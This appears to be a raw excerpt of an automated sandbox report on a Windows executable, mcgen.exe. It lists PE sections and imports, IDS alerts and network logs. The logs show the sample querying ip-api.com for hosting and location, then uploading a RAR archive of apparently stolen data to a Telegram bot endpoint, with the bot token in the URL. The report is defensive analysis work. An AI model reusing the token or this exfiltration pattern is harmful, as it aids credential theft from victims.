                                                                                                                                                                                                                                                                  IMAGE_DIRECTORY_ENTRY_SECURITY0x7a959d0x2448
                                                                                                                                                                                                                                                                  IMAGE_DIRECTORY_ENTRY_BASERELOC0x580000x764.reloc
                                                                                                                                                                                                                                                                  IMAGE_DIRECTORY_ENTRY_DEBUG0x3a0800x1c.rdata
                                                                                                                                                                                                                                                                  IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                                                                                                                                                                                                  IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                                                                                                                                                                                                  IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                                                                                                                                                                                                  IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x39f400x140.rdata
                                                                                                                                                                                                                                                                  IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                                                                                                                                                                                                  IMAGE_DIRECTORY_ENTRY_IAT0x2b0000x4a0.rdata
                                                                                                                                                                                                                                                                  IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                                                                                                                                                                                                  IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                                                                                                                                                                                                                  IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                                                                                                                                                                                                                                                                  NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                                                                                                                                                                                                  .text0x10000x29f700x2a000b8c3814c5fb0b18492ad4ec2ffe0830aFalse0.5518740699404762data6.489205819736506IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                                                                                                                                                                                                                  .rdata0x2b0000x12a280x12c00e60178cf99b2f4fd257b06f2445a2d99False0.5243229166666666data5.7507635030665485IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                                                                                                                                                                  .data0x3e0000x53f80xe00dba0caeecab624a0ccc0d577241601d1False0.134765625data1.8392217063172436IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                                                                                                                                                  .pdata0x440000x22380x24009cd1eac931545f28ab09329f8bfce843False0.4697265625data5.2645170849678795IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                                                                                                                                                                  .rsrc0x470000x103e80x10400ba7d9756a737d22062ac9e87bd5f4435False0.9790715144230769data7.968679116370686IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                                                                                                                                                                  .reloc0x580000x7640x800816c68eeb419ee2c08656c31c06a0fffFalse0.5576171875data5.2809528666624175IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                                                                                                                                                                                                                                                                  NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                                                                                                                                                                                                                  RT_ICON0x472200x38ePNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced1.012087912087912
                                                                                                                                                                                                                                                                  RT_ICON0x475b00x731PNG image data, 24 x 24, 8-bit/color RGBA, non-interlaced1.0059750135795764
                                                                                                                                                                                                                                                                  RT_ICON0x47ce40xc14PNG image data, 32 x 32, 8-bit/color RGBA, non-interlaced1.0035575679172057
                                                                                                                                                                                                                                                                  RT_ICON0x488f80x1991PNG image data, 48 x 48, 8-bit/color RGBA, non-interlaced1.0016806722689076
                                                                                                                                                                                                                                                                  RT_ICON0x4a28c0x2b7aPNG image data, 64 x 64, 8-bit/color RGBA, non-interlaced1.0009883198562444
                                                                                                                                                                                                                                                                  RT_ICON0x4ce080x9c8bPNG image data, 128 x 128, 8-bit/color RGBA, non-interlaced1.000524017467249
                                                                                                                                                                                                                                                                  RT_GROUP_ICON0x56a940x5adata0.8111111111111111
                                                                                                                                                                                                                                                                  RT_VERSION0x56af00x3e8data0.446
                                                                                                                                                                                                                                                                  RT_MANIFEST0x56ed80x50dXML 1.0 document, ASCII text0.4694508894044857
                                                                                                                                                                                                                                                                  DLLImport
                                                                                                                                                                                                                                                                  USER32.dllCreateWindowExW, ShutdownBlockReasonCreate, MsgWaitForMultipleObjects, ShowWindow, DestroyWindow, RegisterClassW, DefWindowProcW, PeekMessageW, DispatchMessageW, TranslateMessage, PostMessageW, GetMessageW, MessageBoxW, MessageBoxA, SystemParametersInfoW, DestroyIcon, SetWindowLongPtrW, GetWindowLongPtrW, GetClientRect, InvalidateRect, ReleaseDC, GetDC, DrawTextW, GetDialogBaseUnits, EndDialog, DialogBoxIndirectParamW, MoveWindow, SendMessageW
                                                                                                                                                                                                                                                                  COMCTL32.dll
                                                                                                                                                                                                                                                                  KERNEL32.dllGetACP, IsValidCodePage, GetStringTypeW, GetFileAttributesExW, SetEnvironmentVariableW, FlushFileBuffers, GetCurrentDirectoryW, LCMapStringW, CompareStringW, FlsFree, GetOEMCP, GetCPInfo, GetModuleHandleW, MulDiv, FormatMessageW, GetLastError, GetModuleFileNameW, LoadLibraryExW, SetDllDirectoryW, CreateSymbolicLinkW, GetProcAddress, GetEnvironmentStringsW, GetCommandLineW, GetEnvironmentVariableW, ExpandEnvironmentStringsW, DeleteFileW, FindClose, FindFirstFileW, FindNextFileW, GetDriveTypeW, RemoveDirectoryW, GetTempPathW, CloseHandle, QueryPerformanceCounter, QueryPerformanceFrequency, WaitForSingleObject, Sleep, GetCurrentProcess, TerminateProcess, GetExitCodeProcess, CreateProcessW, GetStartupInfoW, FreeLibrary, LocalFree, SetConsoleCtrlHandler, K32EnumProcessModules, K32GetModuleFileNameExW, CreateFileW, FindFirstFileExW, GetFinalPathNameByHandleW, MultiByteToWideChar, WideCharToMultiByte, FlsSetValue, FreeEnvironmentStringsW, GetProcessHeap, GetTimeZoneInformation, HeapSize, HeapReAlloc, WriteConsoleW, SetEndOfFile, CreateDirectoryW, RtlCaptureContext, RtlLookupFunctionEntry, RtlVirtualUnwind, UnhandledExceptionFilter, SetUnhandledExceptionFilter, IsProcessorFeaturePresent, GetCurrentProcessId, GetCurrentThreadId, GetSystemTimeAsFileTime, InitializeSListHead, IsDebuggerPresent, RtlUnwindEx, SetLastError, EnterCriticalSection, LeaveCriticalSection, DeleteCriticalSection, InitializeCriticalSectionAndSpinCount, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, EncodePointer, RaiseException, RtlPcToFileHeader, GetCommandLineA, GetFileInformationByHandle, GetFileType, PeekNamedPipe, SystemTimeToTzSpecificLocalTime, FileTimeToSystemTime, ReadFile, GetFullPathNameW, SetStdHandle, GetStdHandle, WriteFile, ExitProcess, GetModuleHandleExW, HeapFree, GetConsoleMode, ReadConsoleW, SetFilePointerEx, GetConsoleOutputCP, GetFileSizeEx, HeapAlloc, FlsAlloc, FlsGetValue
                                                                                                                                                                                                                                                                  ADVAPI32.dllOpenProcessToken, GetTokenInformation, ConvertStringSecurityDescriptorToSecurityDescriptorW, ConvertSidToStringSidW
                                                                                                                                                                                                                                                                  GDI32.dllSelectObject, DeleteObject, CreateFontIndirectW
                                                                                                                                                                                                                                                                  TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                                                                                                                                                                                                                  2025-01-02T09:22:39.750486+01001810008Joe Security ANOMALY Telegram Send File1192.168.2.649894149.154.167.220443TCP
                                                                                                                                                                                                                                                                  2025-01-02T09:22:39.750661+01002857751ETPRO MALWARE SynthIndi Loader Exfiltration Activity (POST)1192.168.2.649894149.154.167.220443TCP
                                                                                                                                                                                                                                                                  2025-01-02T09:22:41.094206+01002857752ETPRO MALWARE SynthIndi Loader CnC Response1149.154.167.220443192.168.2.649894TCP
                                                                                                                                                                                                                                                                  TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                                                                                                                                  Jan 2, 2025 09:22:05.325412989 CET4971880192.168.2.6208.95.112.1
                                                                                                                                                                                                                                                                  Jan 2, 2025 09:22:05.330235958 CET8049718208.95.112.1192.168.2.6
                                                                                                                                                                                                                                                                  Jan 2, 2025 09:22:05.330300093 CET4971880192.168.2.6208.95.112.1
                                                                                                                                                                                                                                                                  Jan 2, 2025 09:22:05.330420017 CET4971880192.168.2.6208.95.112.1
                                                                                                                                                                                                                                                                  Jan 2, 2025 09:22:05.335273027 CET8049718208.95.112.1192.168.2.6
                                                                                                                                                                                                                                                                  Jan 2, 2025 09:22:05.867588997 CET8049718208.95.112.1192.168.2.6
                                                                                                                                                                                                                                                                  Jan 2, 2025 09:22:05.886663914 CET4971880192.168.2.6208.95.112.1
                                                                                                                                                                                                                                                                  Jan 2, 2025 09:22:05.891746998 CET8049718208.95.112.1192.168.2.6
                                                                                                                                                                                                                                                                  Jan 2, 2025 09:22:05.892767906 CET4971880192.168.2.6208.95.112.1
                                                                                                                                                                                                                                                                  Jan 2, 2025 09:22:38.398116112 CET4988880192.168.2.6208.95.112.1
                                                                                                                                                                                                                                                                  Jan 2, 2025 09:22:38.402924061 CET8049888208.95.112.1192.168.2.6
                                                                                                                                                                                                                                                                  Jan 2, 2025 09:22:38.402996063 CET4988880192.168.2.6208.95.112.1
                                                                                                                                                                                                                                                                  Jan 2, 2025 09:22:38.403181076 CET4988880192.168.2.6208.95.112.1
                                                                                                                                                                                                                                                                  Jan 2, 2025 09:22:38.407991886 CET8049888208.95.112.1192.168.2.6
                                                                                                                                                                                                                                                                  Jan 2, 2025 09:22:38.893599033 CET8049888208.95.112.1192.168.2.6
                                                                                                                                                                                                                                                                  Jan 2, 2025 09:22:38.943870068 CET4988880192.168.2.6208.95.112.1
                                                                                                                                                                                                                                                                  Jan 2, 2025 09:22:39.110428095 CET49894443192.168.2.6149.154.167.220
                                                                                                                                                                                                                                                                  Jan 2, 2025 09:22:39.110449076 CET44349894149.154.167.220192.168.2.6
                                                                                                                                                                                                                                                                  Jan 2, 2025 09:22:39.110614061 CET49894443192.168.2.6149.154.167.220
                                                                                                                                                                                                                                                                  Jan 2, 2025 09:22:39.136713028 CET49894443192.168.2.6149.154.167.220
                                                                                                                                                                                                                                                                  Jan 2, 2025 09:22:39.136730909 CET44349894149.154.167.220192.168.2.6
                                                                                                                                                                                                                                                                  Jan 2, 2025 09:22:39.746376991 CET44349894149.154.167.220192.168.2.6
                                                                                                                                                                                                                                                                  Jan 2, 2025 09:22:39.746793032 CET49894443192.168.2.6149.154.167.220
                                                                                                                                                                                                                                                                  Jan 2, 2025 09:22:39.746817112 CET44349894149.154.167.220192.168.2.6
                                                                                                                                                                                                                                                                  Jan 2, 2025 09:22:39.748145103 CET44349894149.154.167.220192.168.2.6
                                                                                                                                                                                                                                                                  Jan 2, 2025 09:22:39.748209953 CET49894443192.168.2.6149.154.167.220
                                                                                                                                                                                                                                                                  Jan 2, 2025 09:22:39.749852896 CET49894443192.168.2.6149.154.167.220
                                                                                                                                                                                                                                                                  Jan 2, 2025 09:22:39.749936104 CET44349894149.154.167.220192.168.2.6
                                                                                                                                                                                                                                                                  Jan 2, 2025 09:22:39.750138998 CET49894443192.168.2.6149.154.167.220
                                                                                                                                                                                                                                                                  Jan 2, 2025 09:22:39.750148058 CET44349894149.154.167.220192.168.2.6
                                                                                                                                                                                                                                                                  Jan 2, 2025 09:22:39.750224113 CET49894443192.168.2.6149.154.167.220
                                                                                                                                                                                                                                                                  Jan 2, 2025 09:22:39.750264883 CET44349894149.154.167.220192.168.2.6
                                                                                                                                                                                                                                                                  Jan 2, 2025 09:22:39.750415087 CET49894443192.168.2.6149.154.167.220
                                                                                                                                                                                                                                                                  Jan 2, 2025 09:22:39.750457048 CET44349894149.154.167.220192.168.2.6
                                                                                                                                                                                                                                                                  Jan 2, 2025 09:22:39.750583887 CET49894443192.168.2.6149.154.167.220
                                                                                                                                                                                                                                                                  Jan 2, 2025 09:22:39.750628948 CET44349894149.154.167.220192.168.2.6
                                                                                                                                                                                                                                                                  Jan 2, 2025 09:22:39.750745058 CET49894443192.168.2.6149.154.167.220
                                                                                                                                                                                                                                                                  Jan 2, 2025 09:22:39.750770092 CET44349894149.154.167.220192.168.2.6
                                                                                                                                                                                                                                                                  Jan 2, 2025 09:22:39.750792980 CET49894443192.168.2.6149.154.167.220
                                                                                                                                                                                                                                                                  Jan 2, 2025 09:22:39.750802994 CET44349894149.154.167.220192.168.2.6
                                                                                                                                                                                                                                                                  Jan 2, 2025 09:22:39.750859022 CET49894443192.168.2.6149.154.167.220
                                                                                                                                                                                                                                                                  Jan 2, 2025 09:22:39.750869989 CET44349894149.154.167.220192.168.2.6
                                                                                                                                                                                                                                                                  Jan 2, 2025 09:22:39.750885010 CET49894443192.168.2.6149.154.167.220
                                                                                                                                                                                                                                                                  Jan 2, 2025 09:22:39.750902891 CET44349894149.154.167.220192.168.2.6
                                                                                                                                                                                                                                                                  Jan 2, 2025 09:22:39.750910044 CET49894443192.168.2.6149.154.167.220
                                                                                                                                                                                                                                                                  Jan 2, 2025 09:22:39.750919104 CET44349894149.154.167.220192.168.2.6
                                                                                                                                                                                                                                                                  Jan 2, 2025 09:22:39.751020908 CET49894443192.168.2.6149.154.167.220
                                                                                                                                                                                                                                                                  Jan 2, 2025 09:22:39.751038074 CET44349894149.154.167.220192.168.2.6
                                                                                                                                                                                                                                                                  Jan 2, 2025 09:22:39.751043081 CET49894443192.168.2.6149.154.167.220
                                                                                                                                                                                                                                                                  Jan 2, 2025 09:22:39.751051903 CET44349894149.154.167.220192.168.2.6
                                                                                                                                                                                                                                                                  Jan 2, 2025 09:22:39.751075029 CET49894443192.168.2.6149.154.167.220
                                                                                                                                                                                                                                                                  Jan 2, 2025 09:22:39.751084089 CET44349894149.154.167.220192.168.2.6
                                                                                                                                                                                                                                                                  Jan 2, 2025 09:22:39.751104116 CET49894443192.168.2.6149.154.167.220
                                                                                                                                                                                                                                                                  Jan 2, 2025 09:22:39.751111031 CET44349894149.154.167.220192.168.2.6
                                                                                                                                                                                                                                                                  Jan 2, 2025 09:22:39.751215935 CET49894443192.168.2.6149.154.167.220
                                                                                                                                                                                                                                                                  Jan 2, 2025 09:22:39.751231909 CET44349894149.154.167.220192.168.2.6
                                                                                                                                                                                                                                                                  Jan 2, 2025 09:22:39.751245022 CET49894443192.168.2.6149.154.167.220
                                                                                                                                                                                                                                                                  Jan 2, 2025 09:22:39.751254082 CET44349894149.154.167.220192.168.2.6
                                                                                                                                                                                                                                                                  Jan 2, 2025 09:22:39.751274109 CET49894443192.168.2.6149.154.167.220
                                                                                                                                                                                                                                                                  Jan 2, 2025 09:22:39.751280069 CET44349894149.154.167.220192.168.2.6
                                                                                                                                                                                                                                                                  Jan 2, 2025 09:22:39.751305103 CET49894443192.168.2.6149.154.167.220
                                                                                                                                                                                                                                                                  Jan 2, 2025 09:22:39.751319885 CET44349894149.154.167.220192.168.2.6
                                                                                                                                                                                                                                                                  Jan 2, 2025 09:22:39.751332998 CET49894443192.168.2.6149.154.167.220
                                                                                                                                                                                                                                                                  Jan 2, 2025 09:22:39.751339912 CET44349894149.154.167.220192.168.2.6
                                                                                                                                                                                                                                                                  Jan 2, 2025 09:22:39.751354933 CET49894443192.168.2.6149.154.167.220
                                                                                                                                                                                                                                                                  Jan 2, 2025 09:22:39.751362085 CET44349894149.154.167.220192.168.2.6
                                                                                                                                                                                                                                                                  Jan 2, 2025 09:22:39.751374960 CET49894443192.168.2.6149.154.167.220
                                                                                                                                                                                                                                                                  Jan 2, 2025 09:22:39.751380920 CET44349894149.154.167.220192.168.2.6
                                                                                                                                                                                                                                                                  Jan 2, 2025 09:22:39.751413107 CET49894443192.168.2.6149.154.167.220
                                                                                                                                                                                                                                                                  Jan 2, 2025 09:22:39.751421928 CET44349894149.154.167.220192.168.2.6
                                                                                                                                                                                                                                                                  Jan 2, 2025 09:22:39.751485109 CET49894443192.168.2.6149.154.167.220
                                                                                                                                                                                                                                                                  Jan 2, 2025 09:22:39.751499891 CET49894443192.168.2.6149.154.167.220
                                                                                                                                                                                                                                                                  Jan 2, 2025 09:22:39.751524925 CET49894443192.168.2.6149.154.167.220
                                                                                                                                                                                                                                                                  Jan 2, 2025 09:22:39.751544952 CET49894443192.168.2.6149.154.167.220
                                                                                                                                                                                                                                                                  Jan 2, 2025 09:22:39.751565933 CET49894443192.168.2.6149.154.167.220
                                                                                                                                                                                                                                                                  Jan 2, 2025 09:22:39.751579046 CET49894443192.168.2.6149.154.167.220
                                                                                                                                                                                                                                                                  Jan 2, 2025 09:22:39.751595020 CET49894443192.168.2.6149.154.167.220
                                                                                                                                                                                                                                                                  Jan 2, 2025 09:22:39.751681089 CET49894443192.168.2.6149.154.167.220
                                                                                                                                                                                                                                                                  Jan 2, 2025 09:22:39.751693964 CET49894443192.168.2.6149.154.167.220
                                                                                                                                                                                                                                                                  Jan 2, 2025 09:22:39.751719952 CET49894443192.168.2.6149.154.167.220
                                                                                                                                                                                                                                                                  Jan 2, 2025 09:22:39.755613089 CET44349894149.154.167.220192.168.2.6
                                                                                                                                                                                                                                                                  Jan 2, 2025 09:22:39.755776882 CET49894443192.168.2.6149.154.167.220
                                                                                                                                                                                                                                                                  Jan 2, 2025 09:22:39.755800009 CET44349894149.154.167.220192.168.2.6
                                                                                                                                                                                                                                                                  Jan 2, 2025 09:22:39.755855083 CET49894443192.168.2.6149.154.167.220
                                                                                                                                                                                                                                                                  Jan 2, 2025 09:22:39.755877018 CET44349894149.154.167.220192.168.2.6
                                                                                                                                                                                                                                                                  Jan 2, 2025 09:22:39.755898952 CET49894443192.168.2.6149.154.167.220
                                                                                                                                                                                                                                                                  Jan 2, 2025 09:22:39.755918980 CET49894443192.168.2.6149.154.167.220
                                                                                                                                                                                                                                                                  Jan 2, 2025 09:22:39.756020069 CET49894443192.168.2.6149.154.167.220
                                                                                                                                                                                                                                                                  Jan 2, 2025 09:22:39.756042957 CET49894443192.168.2.6149.154.167.220
                                                                                                                                                                                                                                                                  Jan 2, 2025 09:22:39.756062984 CET49894443192.168.2.6149.154.167.220
                                                                                                                                                                                                                                                                  Jan 2, 2025 09:22:39.756072998 CET49894443192.168.2.6149.154.167.220
                                                                                                                                                                                                                                                                  Jan 2, 2025 09:22:39.756095886 CET49894443192.168.2.6149.154.167.220
                                                                                                                                                                                                                                                                  Jan 2, 2025 09:22:39.756120920 CET49894443192.168.2.6149.154.167.220
                                                                                                                                                                                                                                                                  Jan 2, 2025 09:22:39.756129026 CET49894443192.168.2.6149.154.167.220
                                                                                                                                                                                                                                                                  Jan 2, 2025 09:22:39.756145000 CET49894443192.168.2.6149.154.167.220
                                                                                                                                                                                                                                                                  Jan 2, 2025 09:22:39.756201029 CET49894443192.168.2.6149.154.167.220
                                                                                                                                                                                                                                                                  Jan 2, 2025 09:22:39.765439987 CET44349894149.154.167.220192.168.2.6
                                                                                                                                                                                                                                                                  Jan 2, 2025 09:22:39.765582085 CET49894443192.168.2.6149.154.167.220
                                                                                                                                                                                                                                                                  Jan 2, 2025 09:22:39.765600920 CET44349894149.154.167.220192.168.2.6
                                                                                                                                                                                                                                                                  Jan 2, 2025 09:22:39.765678883 CET49894443192.168.2.6149.154.167.220
                                                                                                                                                                                                                                                                  Jan 2, 2025 09:22:39.765688896 CET44349894149.154.167.220192.168.2.6
                                                                                                                                                                                                                                                                  Jan 2, 2025 09:22:39.765712976 CET49894443192.168.2.6149.154.167.220
                                                                                                                                                                                                                                                                  Jan 2, 2025 09:22:39.765938044 CET44349894149.154.167.220192.168.2.6
                                                                                                                                                                                                                                                                  Jan 2, 2025 09:22:41.093986034 CET44349894149.154.167.220192.168.2.6
                                                                                                                                                                                                                                                                  Jan 2, 2025 09:22:41.094001055 CET44349894149.154.167.220192.168.2.6
                                                                                                                                                                                                                                                                  Jan 2, 2025 09:22:41.094060898 CET49894443192.168.2.6149.154.167.220
                                                                                                                                                                                                                                                                  Jan 2, 2025 09:22:41.094089031 CET44349894149.154.167.220192.168.2.6
                                                                                                                                                                                                                                                                  Jan 2, 2025 09:22:41.094106913 CET44349894149.154.167.220192.168.2.6
                                                                                                                                                                                                                                                                  Jan 2, 2025 09:22:41.094150066 CET49894443192.168.2.6149.154.167.220
                                                                                                                                                                                                                                                                  Jan 2, 2025 09:22:41.094628096 CET49894443192.168.2.6149.154.167.220
                                                                                                                                                                                                                                                                  Jan 2, 2025 09:22:41.246397018 CET4988880192.168.2.6208.95.112.1
                                                                                                                                                                                                                                                                  Jan 2, 2025 09:22:41.251400948 CET8049888208.95.112.1192.168.2.6
                                                                                                                                                                                                                                                                  Jan 2, 2025 09:22:41.251498938 CET4988880192.168.2.6208.95.112.1
                                                                                                                                                                                                                                                                  TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                                                                                                                                  Jan 2, 2025 09:22:03.979367971 CET5143253192.168.2.61.1.1.1
                                                                                                                                                                                                                                                                  Jan 2, 2025 09:22:03.988182068 CET53514321.1.1.1192.168.2.6
                                                                                                                                                                                                                                                                  Jan 2, 2025 09:22:05.314940929 CET5985453192.168.2.61.1.1.1
                                                                                                                                                                                                                                                                  Jan 2, 2025 09:22:05.321820974 CET53598541.1.1.1192.168.2.6
                                                                                                                                                                                                                                                                  Jan 2, 2025 09:22:38.390405893 CET5914653192.168.2.61.1.1.1
                                                                                                                                                                                                                                                                  Jan 2, 2025 09:22:38.397166967 CET53591461.1.1.1192.168.2.6
                                                                                                                                                                                                                                                                  Jan 2, 2025 09:22:39.101531982 CET4918653192.168.2.61.1.1.1
                                                                                                                                                                                                                                                                  Jan 2, 2025 09:22:39.108525991 CET53491861.1.1.1192.168.2.6
                                                                                                                                                                                                                                                                  TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                                                                                                                                                                                  Jan 2, 2025 09:22:03.979367971 CET192.168.2.61.1.1.10x44ddStandard query (0)blank-q0y5l.inA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                  Jan 2, 2025 09:22:05.314940929 CET192.168.2.61.1.1.10x79dcStandard query (0)ip-api.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                  Jan 2, 2025 09:22:38.390405893 CET192.168.2.61.1.1.10xa383Standard query (0)ip-api.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                  Jan 2, 2025 09:22:39.101531982 CET192.168.2.61.1.1.10xaa1Standard query (0)api.telegram.orgA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                  TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                                                                                                                                                                                  Jan 2, 2025 09:22:03.988182068 CET1.1.1.1192.168.2.60x44ddName error (3)blank-q0y5l.innonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                  Jan 2, 2025 09:22:05.321820974 CET1.1.1.1192.168.2.60x79dcNo error (0)ip-api.com208.95.112.1A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                  Jan 2, 2025 09:22:38.397166967 CET1.1.1.1192.168.2.60xa383No error (0)ip-api.com208.95.112.1A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                  Jan 2, 2025 09:22:39.108525991 CET1.1.1.1192.168.2.60xaa1No error (0)api.telegram.org149.154.167.220A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                  • api.telegram.org
                                                                                                                                                                                                                                                                  • ip-api.com
                                                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                  0192.168.2.649718208.95.112.1807020C:\Users\user\Desktop\mcgen.exe
                                                                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                  Jan 2, 2025 09:22:05.330420017 CET117OUTGET /line/?fields=hosting HTTP/1.1
                                                                                                                                                                                                                                                                  Host: ip-api.com
                                                                                                                                                                                                                                                                  Accept-Encoding: identity
                                                                                                                                                                                                                                                                  User-Agent: python-urllib3/2.3.0
                                                                                                                                                                                                                                                                  Jan 2, 2025 09:22:05.867588997 CET175INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                  Date: Thu, 02 Jan 2025 08:22:05 GMT
                                                                                                                                                                                                                                                                  Content-Type: text/plain; charset=utf-8
                                                                                                                                                                                                                                                                  Content-Length: 6
                                                                                                                                                                                                                                                                  Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                                                  X-Ttl: 60
                                                                                                                                                                                                                                                                  X-Rl: 44
                                                                                                                                                                                                                                                                  Data Raw: 66 61 6c 73 65 0a
                                                                                                                                                                                                                                                                  Data Ascii: false


                                                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                  1192.168.2.649888208.95.112.1807020C:\Users\user\Desktop\mcgen.exe
                                                                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                  Jan 2, 2025 09:22:38.403181076 CET116OUTGET /json/?fields=225545 HTTP/1.1
                                                                                                                                                                                                                                                                  Host: ip-api.com
                                                                                                                                                                                                                                                                  Accept-Encoding: identity
                                                                                                                                                                                                                                                                  User-Agent: python-urllib3/2.3.0
                                                                                                                                                                                                                                                                  Jan 2, 2025 09:22:38.893599033 CET381INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                  Date: Thu, 02 Jan 2025 08:22:37 GMT
                                                                                                                                                                                                                                                                  Content-Type: application/json; charset=utf-8
                                                                                                                                                                                                                                                                  Content-Length: 204
                                                                                                                                                                                                                                                                  Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                                                  X-Ttl: 60
                                                                                                                                                                                                                                                                  X-Rl: 44
                                                                                                                                                                                                                                                                  Data Raw: 7b 22 73 74 61 74 75 73 22 3a 22 73 75 63 63 65 73 73 22 2c 22 63 6f 75 6e 74 72 79 22 3a 22 55 6e 69 74 65 64 20 53 74 61 74 65 73 22 2c 22 72 65 67 69 6f 6e 4e 61 6d 65 22 3a 22 4e 65 77 20 59 6f 72 6b 22 2c 22 74 69 6d 65 7a 6f 6e 65 22 3a 22 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 22 2c 22 72 65 76 65 72 73 65 22 3a 22 73 74 61 74 69 63 2d 63 70 65 2d 38 2d 34 36 2d 31 32 33 2d 31 38 39 2e 63 65 6e 74 75 72 79 6c 69 6e 6b 2e 63 6f 6d 22 2c 22 6d 6f 62 69 6c 65 22 3a 66 61 6c 73 65 2c 22 70 72 6f 78 79 22 3a 66 61 6c 73 65 2c 22 71 75 65 72 79 22 3a 22 38 2e 34 36 2e 31 32 33 2e 31 38 39 22 7d
                                                                                                                                                                                                                                                                  Data Ascii: {"status":"success","country":"United States","regionName":"New York","timezone":"America/New_York","reverse":"static-cpe-8-46-123-189.centurylink.com","mobile":false,"proxy":false,"query":"8.46.123.189"}


                                                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                  0192.168.2.649894149.154.167.2204437020C:\Users\user\Desktop\mcgen.exe
                                                                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                  2025-01-02 08:22:39 UTC268OUTPOST /bot7770343182:AAFH0EKMbwNwFcAUN5qW8m0OzxUEjm5sVvs/sendDocument HTTP/1.1
                                                                                                                                                                                                                                                                  Host: api.telegram.org
                                                                                                                                                                                                                                                                  Accept-Encoding: identity
                                                                                                                                                                                                                                                                  Content-Length: 727365
                                                                                                                                                                                                                                                                  User-Agent: python-urllib3/2.3.0
                                                                                                                                                                                                                                                                  Content-Type: multipart/form-data; boundary=15fc0aba29de58fbc6372618a4a7a3b7
                                                                                                                                                                                                                                                                  2025-01-02 08:22:39 UTC16384OUTData Raw: 2d 2d 31 35 66 63 30 61 62 61 32 39 64 65 35 38 66 62 63 36 33 37 32 36 31 38 61 34 61 37 61 33 62 37 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 42 6c 61 6e 6b 2d 65 6e 67 69 6e 65 65 72 2e 72 61 72 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 6f 63 74 65 74 2d 73 74 72 65 61 6d 0d 0a 0d 0a 52 61 72 21 1a 07 01 00 1f a8 d1 f5 21 04 00 00 01 0f 9e 48 a5 72 7a 0f 08 72 64 86 ae 7c fd f2 58 68 16 6a 65 51 27 4d c9 25 e6 1b 8c ce eb b4 b6 0c e4 50 b6 76 da 77 24 b4 07 cf 5e 59 b6 f5 38 c3 89 29 4a ac b8 1a fb 42 8f fd 2e 36 05 b2 49 cc f6 54 85 f0 69 57 3e 4a 86 d2 c4 27 83 76 e3
                                                                                                                                                                                                                                                                  Data Ascii: --15fc0aba29de58fbc6372618a4a7a3b7Content-Disposition: form-data; name="document"; filename="Blank-user.rar"Content-Type: application/octet-streamRar!!Hrzrd|XhjeQ'M%Pvw$^Y8)JB.6ITiW>J'v
